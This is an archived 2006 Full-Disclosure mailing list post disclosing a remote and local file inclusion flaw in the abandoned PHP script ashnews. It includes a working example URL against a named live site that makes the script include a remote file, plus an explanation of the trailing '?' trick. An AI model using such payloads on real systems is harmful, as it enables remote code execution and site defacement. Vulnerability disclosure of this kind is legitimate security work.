lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <43DF3F47.8010700@f-box.org>
Date: Tue, 31 Jan 2006 10:43:19 +0000
From: DanB-FD <dan-fd@...ox.org>
To: Dan B UK <dan-fd@...ox.org>
Cc: zeus olimpusklan <zeus.olimpusklan@...il.com>,
	full-disclosure@...ts.grok.org.uk, bugtraq@...urityfocus.com,
	admin@...e-h.org, org@...urity.nnov.ru
Subject: Re: ashnews Cross-Site Scripting Vulnerability


Hi,

Dan B UK wrote:

> Due to the nature of the issue I am not disclosing the detail of it 
> until the writer of the software has updated it; maybe you could have 
> waited??
>
> A vulnerability that allows privileges of the apache user within the 
> limitations of how much PHP has been locked down.


Since the author of the product has got back to me with the following I 
think it is ok to disclose the issue now.

"That is a known error. Unfortunately I have completely abondoned 
ashnews. In fact, I have been neglecting taking it down completely which 
I am going to do right now. - Derek"

The issue is in the handling of the $pathtoashnews, it is not validated 
before being used by the script. Allowing remote or local file inclusion.

eg: 
http://dosko.nl/news/ashnews.php?pathtoashnews=http://f-box.org/~dan/inc.inc?
( The ? is required to make the remote server (f-box.org) ignore the 
string that is appended to the variable $pathtoashnews )
( The website that is in the example above has already been defaced! )

Cheers,
DanB UK.


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ